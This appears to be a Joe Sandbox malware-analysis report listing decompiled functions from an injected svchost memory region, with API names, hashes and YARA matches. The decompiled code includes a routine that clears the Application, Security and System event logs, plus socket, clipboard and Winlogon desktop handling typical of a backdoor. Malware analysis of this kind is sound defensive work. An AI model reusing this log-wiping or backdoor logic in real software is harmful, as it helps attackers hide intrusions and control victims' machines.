                                                            • Instruction ID: 8dc2e0441809bd964d8ce13fc66c36968182804f52f4ef969383a6e9702e1d12
                                                            • Opcode Fuzzy Hash: 5313be252f9b7b0df6761ce223440e109078e93a4f508decd9cae49f029374e0
                                                            • Instruction Fuzzy Hash: 9921293B301B44A3EE698B66E55C35973A0F789B95F040524DE4E07F59EF3AE465C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$FreeInitializeProcess$DescriptorFileSecurity$AccessAllocAllocateAllowedCreateDaclLengthMappingView
                                                            • String ID: ($_kasssperskdy
                                                            • API String ID: 2879929819-2461904655
                                                            • Opcode ID: a09182481e26ac669774c95539dac808cf2a20b18b52c631822ebdde99700a0c
                                                            • Instruction ID: 36f0da76d5c286b0f1bc43cfe7d857f63d9d96dc3594e641c0b463b8fafdac8a
                                                            • Opcode Fuzzy Hash: a09182481e26ac669774c95539dac808cf2a20b18b52c631822ebdde99700a0c
                                                            • Instruction Fuzzy Hash: FA219233205B8095EB618F94F58C78AB7B0FB843A4F445629AA9903B99DF3DC058CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Message$BufferDispatchEventObjectSingleTranslateWaitwave
                                                            • String ID:
                                                            • API String ID: 3294988761-0
                                                            • Opcode ID: b229231a95d4e4669231b89e5171f42b00590e29d1cdf037308d4e367971940c
                                                            • Instruction ID: 06a1a7319b5f58176d09a4da3682cbd0e4be38da41d8f2c8fe5bd0c312998ac1
                                                            • Opcode Fuzzy Hash: b229231a95d4e4669231b89e5171f42b00590e29d1cdf037308d4e367971940c
                                                            • Instruction Fuzzy Hash: BA11E733B10440A3FB719F75E86C7AA73A1FB98B68F400610DA1DC3599DF2AC685C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Time$File$System$CreateLocalSpecificwsprintf
                                                            • String ID: %04d-%02d-%02d %02d:%02d
                                                            • API String ID: 4290651727-1132360693
                                                            • Opcode ID: 2f775c0bd6f7a4fa5cd52691ffe0a95143ab3886e29badf1376ce20509019764
                                                            • Instruction ID: e71acd0fd6a46e209f71412ee204eaf61eb05b3e1507e8a295634ee0759702af
                                                            • Opcode Fuzzy Hash: 2f775c0bd6f7a4fa5cd52691ffe0a95143ab3886e29badf1376ce20509019764
                                                            • Instruction Fuzzy Hash: F6119773218B40A2EB618F91F44979FBBB1F788795F404012EA8906A69EF7EC148CF40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DesktopThread$Current$CloseInformationMessageObjectOpenPostUser
                                                            • String ID: Winlogon
                                                            • API String ID: 3882203166-744610081
                                                            • Opcode ID: 8533d69ea8b4b2f8455bd460f2e74664a681840af0649eb1cacb9ea3f36c704d
                                                            • Instruction ID: 7d36346a2def606d03cc1eeac4b24b1c232b929cded819c11af086a28c508c5c
                                                            • Opcode Fuzzy Hash: 8533d69ea8b4b2f8455bd460f2e74664a681840af0649eb1cacb9ea3f36c704d
                                                            • Instruction Fuzzy Hash: 9901FE33B1154462FF7A97A6B44D7A97392EB48BC5F441030DE2A07B87EF3AC4514700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                            • String ID:
                                                            • API String ID: 1677084743-0
                                                            • Opcode ID: a114f2aed88e79640990e4e7ea3f045385930bbca154a15c8b0be12dd73718a6
                                                            • Instruction ID: 2b2c761cfe4474c43233c0d1481ed9fb46dc266eb1cbd0b63a5a4af904106e5b
                                                            • Opcode Fuzzy Hash: a114f2aed88e79640990e4e7ea3f045385930bbca154a15c8b0be12dd73718a6
                                                            • Instruction Fuzzy Hash: 1B017C67715744B2FE6A5B96B85C3A9B390BB49BC1F080429DD0A0B79ADF3DC4418300
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 21%
                                                            			E0000022B22BAF53C050(signed int __ecx, long long __rbx, long long __rsi, long long _a8, long long _a16) {
                                                            				signed int _v16;
                                                            				long long _v24;
                                                            				long long _v32;
                                                            				long long _v40;
                                                            				signed long long _t23;
                                                            				long long _t27;
                                                            				void* _t40;
                                                            
                                                            				_a8 = __rbx;
                                                            				_a16 = __rsi;
                                                            				_t23 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v16 = _t23 ^ _t40 - 0x00000040;
                                                            				_v40 = "Application";
                                                            				_v32 = "Security";
                                                            				_t27 = "System";
                                                            				_v24 = _t27;
                                                            				OpenEventLogA(??, ??);
                                                            				if (_t27 == 0) goto 0xaf53c0c7;
                                                            				ClearEventLogW(??, ??);
                                                            				CloseEventLog(??);
                                                            				if (1 - 6 < 0) goto 0xaf53c0a0;
                                                            				return E0000022B22BAF55A7C0(__ecx ^ __ecx, _t27, _v16 ^ _t40 - 0x00000040);
                                                            			}
                                                            0x22baf53c050
                                                            0x22baf53c055
                                                            0x22baf53c05f
                                                            0x22baf53c069
                                                            0x22baf53c077
                                                            0x22baf53c088
                                                            0x22baf53c08d
                                                            0x22baf53c094
                                                            0x22baf53c0a5
                                                            0x22baf53c0b1
                                                            0x22baf53c0b8
                                                            0x22baf53c0c1
                                                            0x22baf53c0d0
                                                            0x22baf53c0ee

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Event$ClearCloseOpen
                                                            • String ID: Application$Security$System
                                                            • API String ID: 1391105993-2169399579
                                                            • Opcode ID: 9403e0604ec6e86b20054b468ac63cfb8f8682670110084c64f7fa389618f3b9
                                                            • Instruction ID: 074228c9e906ab5f6c0fd3a0d61554cca843117e7bf78dd85e6a775022118d03
                                                            • Opcode Fuzzy Hash: 9403e0604ec6e86b20054b468ac63cfb8f8682670110084c64f7fa389618f3b9
                                                            • Instruction Fuzzy Hash: 83014036215F80A1EA268B96F49C28EB7A0FB88BD4F444525DA8E03729EF3DC156C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpen$HandleSleepwsprintf$EventObjectQuerySingleThreadValueWait
                                                            • String ID: Dispatch
                                                            • API String ID: 1613615442-2137261068
                                                            • Opcode ID: 6639ad343f6cbc1426152edcdf78c5457f56ca112ab68a50bb0683eae7e315fd
                                                            • Instruction ID: f3bd40e77d9999172313ba8471a8385270fde3f72d19a60c0d7ea36152eac5a2
                                                            • Opcode Fuzzy Hash: 6639ad343f6cbc1426152edcdf78c5457f56ca112ab68a50bb0683eae7e315fd
                                                            • Instruction Fuzzy Hash: C2F04433A01948B1FE37A7F9A85D3F833D2AB88B22F044625D617476E7DF2A84458350
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$Event$EnumEventsNetworkResetSelectrecv
                                                            • String ID:
                                                            • API String ID: 2625475714-0
                                                            • Opcode ID: 56a977729707f79909f4e8639b33f023a4fb1f05d64ad9e7d2a8c705dd88d839
                                                            • Instruction ID: aa815af4267fad233a63054d136b51d731d4cebce009b622193eeae6000f9087
                                                            • Opcode Fuzzy Hash: 56a977729707f79909f4e8639b33f023a4fb1f05d64ad9e7d2a8c705dd88d839
                                                            • Instruction Fuzzy Hash: D2615873204644A6E7768FA5D41C39E77F0F788B98F160119DA898739ACF7AC885CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 17%
                                                            			E0000022B22BAF55A020(intOrPtr* __rcx, void* __rdx, long long __r8, intOrPtr* __r9, long long __r13, long long __r14, long long __r15) {
                                                            				long long _v48;
                                                            				long long _v56;
                                                            				long long _v64;
                                                            				signed int _v88;
                                                            				char _v92;
                                                            				char _v96;
                                                            				long long _v104;
                                                            				long long _v120;
                                                            				void* _v128;
                                                            				long long _v136;
                                                            				void* __rbx;
                                                            				void* __rsi;
                                                            				void* __rbp;
                                                            				intOrPtr _t40;
                                                            				char _t41;
                                                            				intOrPtr _t42;
                                                            				signed long long _t75;
                                                            				long long _t100;
                                                            
                                                            				_t75 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v88 = _t75 ^  &_v128;
                                                            				_v48 = __r13;
                                                            				_v56 = __r14;
                                                            				_v104 = __r8;
                                                            				r14d = 0;
                                                            				_v64 = __r15;
                                                            				if ( *((intOrPtr*)(__rdx + 0x5c)) != 0) goto 0xaf55a14d;
                                                            				if ( *__r9 - 1 > 0) goto 0xaf55a14d;
                                                            				_t40 =  *((intOrPtr*)( *__rcx + 0x198))();
                                                            				_t107 =  &_v96;
                                                            				 *((intOrPtr*)(__r8 + 0x30)) = _t40;
                                                            				_v120 = _t100;
                                                            				_v128 = _t100;
                                                            				r8d = 1;
                                                            				_v136 =  &_v92;
                                                            				_v92 = 0;
                                                            				_v96 = 0;
                                                            				__imp__WSARecv();
                                                            				if (_t40 != 0xffffffff) goto 0xaf55a0d0;
                                                            				__imp__#111();
                                                            				goto 0xaf55a0e2;
                                                            				_t41 = _v96;
                                                            				if (_t41 == 0) goto 0xaf55a0dd;
                                                            				 *((intOrPtr*)(__r8 + 0x30)) = _t41;
                                                            				goto 0xaf55a0e6;
                                                            				if (0x2775 != 0) goto 0xaf55a14d;
                                                            				if ( *((intOrPtr*)(__rdx + 0x40)) == 0) goto 0xaf55a137;
                                                            				EnterCriticalSection(??);
                                                            				if ( *((intOrPtr*)(__rdx + 0x40)) == 0) goto 0xaf55a128;
                                                            				SetLastError(??);
                                                            				r9d =  *((intOrPtr*)(__r8 + 0x30));
                                                            				_t42 =  *((intOrPtr*)( *__rcx + 0x1d0))();
                                                            				LeaveCriticalSection(??);
                                                            				r14d = r14d + 1;
                                                            				 *__r9 = _t42;
                                                            				if (r14d - 0x1e < 0) goto 0xaf55a064;
                                                            				if ( *__r9 - 1 > 0) goto 0xaf55a1d3;
                                                            				if (0x2775 == 0) goto 0xaf55a1d7;
                                                            				if (0x2775 == 0x2733) goto 0xaf55a1d7;
                                                            				if (0x2775 != 0x2775) goto 0xaf55a184;
                                                            				r9d = 0;
                                                            				_v136 = 0;
                                                            				_t33 = _t107 + 1; // 0x1
                                                            				r8d = _t33;
                                                            				goto 0xaf55a1a2;
                                                            				if (0x2775 == 0x2736) goto 0xaf55a1ad;
                                                            				if (0x2775 == 0x3e3) goto 0xaf55a1ad;
                                                            				r9d = 4;
                                                            				_v136 = 0x2775;
                                                            				r8d =  &_v96 - 2;
                                                            				E0000022B22BAF556B50( *__rcx, _v104, __rcx, __rdx, __rdx, _t100);
                                                            				if (E0000022B22BAF54FD40(_v104, __rcx + 0x100, _v104) != 0) goto 0xaf55a1d3;
                                                            				HeapFree(??, ??, ??);
                                                            				goto 0xaf55a1dc;
                                                            				return E0000022B22BAF55A7C0(0,  *__rcx, _v88 ^  &_v128);
                                                            			}
                                                            0x22baf55a02e
                                                            0x22baf55a038
                                                            0x22baf55a03d
                                                            0x22baf55a044
                                                            0x22baf55a04c
                                                            0x22baf55a053
                                                            0x22baf55a056
                                                            0x22baf55a069
                                                            0x22baf55a074
                                                            0x22baf55a081
                                                            0x22baf55a08b
                                                            0x22baf55a090
                                                            0x22baf55a09c
                                                            0x22baf55a0a1
                                                            0x22baf55a0a6
                                                            0x22baf55a0ac
                                                            0x22baf55a0b3
                                                            0x22baf55a0b7
                                                            0x22baf55a0bb
                                                            0x22baf55a0c4
                                                            0x22baf55a0c6
                                                            0x22baf55a0ce
                                                            0x22baf55a0d0
                                                            0x22baf55a0d6
                                                            0x22baf55a0d8
                                                            0x22baf55a0db
                                                            0x22baf55a0e4
                                                            0x22baf55a0ef
                                                            0x22baf55a0f5
                                                            0x22baf55a0ff
                                                            0x22baf55a103
                                                            0x22baf55a118
                                                            0x22baf55a120
                                                            0x22baf55a12c
                                                            0x22baf55a137
                                                            0x22baf55a13a
                                                            0x22baf55a147
                                                            0x22baf55a161
                                                            0x22baf55a165
                                                            0x22baf55a16d
                                                            0x22baf55a175
                                                            0x22baf55a177
                                                            0x22baf55a17a
                                                            0x22baf55a17e
                                                            0x22baf55a17e
                                                            0x22baf55a182
                                                            0x22baf55a18a
                                                            0x22baf55a192
                                                            0x22baf55a194
                                                            0x22baf55a19a
                                                            0x22baf55a19e
                                                            0x22baf55a1a8
                                                            0x22baf55a1bf
                                                            0x22baf55a1cd
                                                            0x22baf55a1d5
                                                            0x22baf55a1f6

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterFreeHeapLeaveRecv
                                                            • String ID:
                                                            • API String ID: 4219686125-0
                                                            • Opcode ID: 12dd66c93670e1939a1ad88641e15ffc3114c39ae3952dc450a49e628984dc07
                                                            • Instruction ID: e14b7952b31c41cd20f67aa5b606afd5672272331784d36ba949b8b716397cf2
                                                            • Opcode Fuzzy Hash: 12dd66c93670e1939a1ad88641e15ffc3114c39ae3952dc450a49e628984dc07
                                                            • Instruction Fuzzy Hash: BA517033204A84A7EB718FA6E44C79E77A4F784B84F544126DF8A43BA6DF3AC445CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 54%
                                                            			E0000022B22BAF552600(long long __rbx, intOrPtr* __rcx, long long __rbp, void* __r8, long long _a16, long long _a24) {
                                                            				void* _v24;
                                                            				signed int _v40;
                                                            				long long _v48;
                                                            				long long _v56;
                                                            				long long _v64;
                                                            				long long _v72;
                                                            				intOrPtr _v88;
                                                            				void* __rdi;
                                                            				void* __rsi;
                                                            				long _t36;
                                                            				void* _t38;
                                                            				intOrPtr _t40;
                                                            				void* _t41;
                                                            				void* _t42;
                                                            				intOrPtr _t45;
                                                            				void* _t53;
                                                            				intOrPtr _t59;
                                                            				void* _t60;
                                                            				signed long long _t74;
                                                            				intOrPtr* _t86;
                                                            				void* _t103;
                                                            				long long _t108;
                                                            				void* _t111;
                                                            				void* _t114;
                                                            				long long _t116;
                                                            
                                                            				_t114 = __r8;
                                                            				_a16 = __rbx;
                                                            				_a24 = __rbp;
                                                            				_t74 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v40 = _t74 ^ _t111 - 0x00000060;
                                                            				_t86 = __rcx;
                                                            				GetCurrentThreadId();
                                                            				_t106 =  *__rcx;
                                                            				_t36 = GetCurrentThreadId();
                                                            				 *((intOrPtr*)( *__rcx + 0x180))();
                                                            				r14d = 0;
                                                            				_t59 =  *((intOrPtr*)(__rcx + 0x40));
                                                            				_v72 =  *((intOrPtr*)(__rcx + 0x30));
                                                            				_v64 =  *((intOrPtr*)(__rcx + 0x1e0));
                                                            				_v56 =  *((intOrPtr*)(__rcx + 0x1e8));
                                                            				_v48 =  *((intOrPtr*)(__rcx + 0x1f0));
                                                            				if ( *((intOrPtr*)(__rcx + 0x80)) == 0) goto 0xaf55269c;
                                                            				_t38 = E0000022B22BAF564114(_t53, _t36, _t60, __rcx, _t103, _t108, __r8);
                                                            				 *((long long*)(_t86 + 0x80)) = _t116;
                                                            				 *((long long*)(_t86 + 0x88)) = _t116;
                                                            				 *((long long*)(_t86 + 0x90)) = _t116;
                                                            				r9d = 0;
                                                            				E0000022B22BAF53CF40(_t38, _t86, _t86 + 0x80, __rbp, _t106);
                                                            				_t40 =  *((intOrPtr*)( *_t86 + 0x48))();
                                                            				if (_t40 == 0) goto 0xaf552746;
                                                            				r8d = 0;
                                                            				_v88 = r14d;
                                                            				r9d = r9d | 0xffffffff;
                                                            				_t22 = _t114 + 4; // 0x4
                                                            				__imp__WSAWaitForMultipleEvents();
                                                            				if (_t40 != 0) goto 0xaf5526e9;
                                                            				_t41 = E0000022B22BAF5527B0(_t40, _t86, _t86, _t106, _t108);
                                                            				goto 0xaf552719;
                                                            				if (_t41 != 1) goto 0xaf5526f7;
                                                            				_t42 = E0000022B22BAF552AF0(_t59, _t41 - 1,  *_t86, _t86, _t86, _t108, __rbp);
                                                            				goto 0xaf552719;
                                                            				if (_t42 == 2) goto 0xaf552743;
                                                            				if (_t42 != 3) goto 0xaf55272c;
                                                            				if ( *((intOrPtr*)( *_t86 + 0x178))() == 0) goto 0xaf552746;
                                                            				if (E0000022B22BAF5529F0(_t86, _t86) == 0) goto 0xaf552746;
                                                            				_t45 =  *((intOrPtr*)( *_t86 + 0x48))();
                                                            				if (_t45 != 0) goto 0xaf5526c0;
                                                            				goto 0xaf552746;
                                                            				if (_t45 != 0xffffffff) goto 0xaf55279e;
                                                            				__imp__#111();
                                                            				 *((intOrPtr*)(_t86 + 0x20)) = _t45;
                                                            				 *((long long*)(_t86 + 0x18)) = _t108;
                                                            				 *((intOrPtr*)(_t86 + 0x24)) = 1;
                                                            				goto 0xaf552746;
                                                            				GetCurrentThreadId();
                                                            				 *((intOrPtr*)( *_t86 + 0x188))();
                                                            				if (r14d == 0) goto 0xaf552774;
                                                            				if ( *((intOrPtr*)( *_t86 + 0x48))() == 0) goto 0xaf552774;
                                                            				 *((intOrPtr*)( *_t86 + 8))();
                                                            				GetCurrentThreadId();
                                                            				return E0000022B22BAF55A7C0(_t22,  *_t86, _v40 ^ _t111 - 0x00000060);
                                                            			}

                                                            Instruction addresses: 0x22baf552600, 0x22baf552600, 0x22baf552605, 0x22baf552612, 0x22baf55261c, 0x22baf552621, 0x22baf552624, 0x22baf55262a, 0x22baf55262d, 0x22baf552638, 0x22baf552642, 0x22baf552651, 0x22baf552654, 0x22baf552660, 0x22baf55266c, 0x22baf552678, 0x22baf552680, 0x22baf552682, 0x22baf552687, 0x22baf55268e, 0x22baf552695, 0x22baf55269c, 0x22baf5526a9, 0x22baf5526b4, 0x22baf5526b9, 0x22baf5526c0, 0x22baf5526c3, 0x22baf5526c8, 0x22baf5526d1, 0x22baf5526d5, 0x22baf5526dd, 0x22baf5526e2, 0x22baf5526e7, 0x22baf5526eb, 0x22baf5526f0, 0x22baf5526f5, 0x22baf5526fa, 0x22baf5526ff, 0x22baf55270f, 0x22baf55271b, 0x22baf552723, 0x22baf552728, 0x22baf55272a, 0x22baf55272f, 0x22baf552731, 0x22baf552737, 0x22baf55273a, 0x22baf55273e, 0x22baf552741, 0x22baf552749, 0x22baf552754, 0x22baf55275c, 0x22baf552769, 0x22baf552771, 0x22baf552774, 0x22baf55279d

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CurrentThread$ErrorEventsFreeHeapLastMultipleWait
                                                            • String ID:
                                                            • API String ID: 115528036-0
                                                            • Opcode ID: 487cbb8aafd0d929da6ac9cc7c94f904b619e2e8e60626a5206b4a75e5ecb2e9
                                                            • Instruction ID: 43f2410504e4d369d2bfe73fdd41209607d37f9792fe17709a13f2ec2af356f0
                                                            • Opcode Fuzzy Hash: 487cbb8aafd0d929da6ac9cc7c94f904b619e2e8e60626a5206b4a75e5ecb2e9
                                                            • Instruction Fuzzy Hash: 46414937210B45A2EB66DF66E85C39D33A0FB49F94F085121DE4A4776ADF39C4458700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID:
                                                            • API String ID: 1452528299-0
                                                            • Opcode ID: 44d350a4b5c83003775e4f9530c2ffe8236e3fd3d788d357e2c3f26dcfd20579
                                                            • Instruction ID: aff83d1bcd39c78f162f92924807a3c209e7e72cd53fbc92622c4209d178dbb6
                                                            • Opcode Fuzzy Hash: 44d350a4b5c83003775e4f9530c2ffe8236e3fd3d788d357e2c3f26dcfd20579
                                                            • Instruction Fuzzy Hash: 9B41EA33300A4096E77E8B96A45C3ED73A2F7C5B96F184421DF5647796DF3AC4818701
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 25%
                                                            			E0000022B22BAF557B40(void* __ecx, void* __rcx, void* __r8, void* __r9) {
                                                            				void* __rbx;
                                                            				void* __rsi;
                                                            				void* __rbp;
                                                            				void* _t18;
                                                            				signed long long _t24;
                                                            				void* _t26;
                                                            				signed long long _t41;
                                                            
                                                            				_t18 = __ecx;
                                                            				_t24 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *(_t41 + 0x38) = _t24 ^ _t41;
                                                            				 *((intOrPtr*)(_t41 + 0x30)) = 0;
                                                            				 *((intOrPtr*)(_t41 + 0x20)) = 4;
                                                            				r8d = 0x7010;
                                                            				__imp__#21();
                                                            				 *((intOrPtr*)(__r8 + 0x58)) = 1;
                                                            				EnterCriticalSection(??);
                                                            				if ( *((intOrPtr*)(__r8 + 0x40)) != 0) goto 0xaf557c05;
                                                            				LeaveCriticalSection(??);
                                                            				r9d = 0;
                                                            				 *((intOrPtr*)(_t41 + 0x20)) = 0;
                                                            				r8d = 0;
                                                            				E0000022B22BAF556B50(_t24 ^ _t41, _t26, __rcx, __r8, __r9, __r8);
                                                            				if (E0000022B22BAF54FD40(_t26, __rcx + 0x100, __r9) != 0) goto 0xaf557bee;
                                                            				HeapFree(??, ??, ??);
                                                            				return E0000022B22BAF55A7C0(_t18, _t24 ^ _t41,  *(_t41 + 0x38) ^ _t41);
                                                            			}

                                                            Instruction addresses: 0x22baf557b40, 0x22baf557b4a, 0x22baf557b54, 0x22baf557b5c, 0x22baf557b67, 0x22baf557b7c, 0x22baf557b89, 0x22baf557b93, 0x22baf557b9a, 0x22baf557ba4, 0x22baf557baa, 0x22baf557bb0, 0x22baf557bb3, 0x22baf557bbb, 0x22baf557bc4, 0x22baf557bda, 0x22baf557be8, 0x22baf557c04

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$Leave$EnterErrorFreeHeapLastTimesetsockopttime
                                                            • String ID:
                                                            • API String ID: 4191520005-0
                                                            • Opcode ID: 136da11a116154dad4e1ad4228e1e2410369dd209a320e9677a29e2ef1bf5a3f
                                                            • Instruction ID: fc03d2948ae37d44514a2619f645e8997f93eadf511c65b80b1718b23879f800
                                                            • Opcode Fuzzy Hash: 136da11a116154dad4e1ad4228e1e2410369dd209a320e9677a29e2ef1bf5a3f
                                                            • Instruction Fuzzy Hash: 2C218D73210688A6EB229F62E85C7ED3760F785BD8F404111EE4E47B9ADF3AC445C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterLeave
                                                            • String ID:
                                                            • API String ID: 2124651672-0
                                                            • Opcode ID: e01c26ba576f1730eadfbeb57038e2ce9451543a762f4fec211c3246469b1ed6
                                                            • Instruction ID: 573eba21a9c4873c4c5ca5536262e9d3d22b723f1087629bf6ee93abe6331d17
                                                            • Opcode Fuzzy Hash: e01c26ba576f1730eadfbeb57038e2ce9451543a762f4fec211c3246469b1ed6
                                                            • Instruction Fuzzy Hash: D7218C33620650E7EBB19B69E08C3EC37A0FB85B5CF141411DA5A476A6DF3BC886CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 45%
                                                            			E0000022B22BAF556190(long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                                                            				void* _t23;
                                                            				void* _t25;
                                                            				long long _t34;
                                                            				void* _t50;
                                                            				void* _t54;
                                                            				void* _t55;
                                                            
                                                            				_t35 = __rbx;
                                                            				_a8 = __rbx;
                                                            				_a16 = __rsi;
                                                            				_t48 = __rdx;
                                                            				if ( *((intOrPtr*)( *__rcx + 0x230))() == 0) goto 0xaf556268;
                                                            				if (E0000022B22BAF556380( *((intOrPtr*)( *__rcx + 0x230))(), __rbx, __rcx, _t50) == 0) goto 0xaf556268;
                                                            				_t34 =  *__rcx;
                                                            				 *((intOrPtr*)(_t34 + 0x238))();
                                                            				if (E0000022B22BAF5564C0(_t23, _t25, __rcx, __rdx, _t50, _t54, _t55) == 0) goto 0xaf556250;
                                                            				r9d = 0;
                                                            				r8d = 0;
                                                            				CreateIoCompletionPort(??, ??, ??, ??);
                                                            				 *((long long*)(__rcx + 0x68)) = _t34;
                                                            				if (_t34 != 0) goto 0xaf556214;
                                                            				GetLastError();
                                                            				 *((intOrPtr*)(__rcx + 0x74)) = 7;
                                                            				SetLastError(??);
                                                            				if ( *((long long*)(__rcx + 0x68)) == 0) goto 0xaf556250;
                                                            				if (E0000022B22BAF556630(_t35, __rcx, _t48) == 0) goto 0xaf556250;
                                                            				 *((intOrPtr*)(__rcx + 0x60)) = r8d;
                                                            				 *((intOrPtr*)(__rcx + 0x70)) = 1;
                                                            				ResetEvent(??);
                                                            				return 1;
                                                            			}

                                                            Instruction addresses: 0x22baf556190, 0x22baf556190, 0x22baf556195, 0x22baf5561a5, 0x22baf5561b3, 0x22baf5561c3, 0x22baf5561c9, 0x22baf5561cf, 0x22baf5561e2, 0x22baf5561e4, 0x22baf5561e7, 0x22baf5561f0, 0x22baf5561f6, 0x22baf5561fd, 0x22baf5561ff, 0x22baf556207, 0x22baf55620e, 0x22baf556219, 0x22baf556225, 0x22baf55622b, 0x22baf55622e, 0x22baf556235, 0x22baf55624f

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$CompletionCreateEventPortResetSwitchThreadbindclosesocketsocket
                                                            • String ID:
                                                            • API String ID: 3234443784-0
                                                            • Opcode ID: 7486dc4a14163c4b92c5367f48587c33ea993da1e3b254e1d047567bec8d3750
                                                            • Instruction ID: caf0987cb50a1a5b1ac04ea1ff6568fd162b7e51697449cfb8caa377be6b295d
                                                            • Opcode Fuzzy Hash: 7486dc4a14163c4b92c5367f48587c33ea993da1e3b254e1d047567bec8d3750
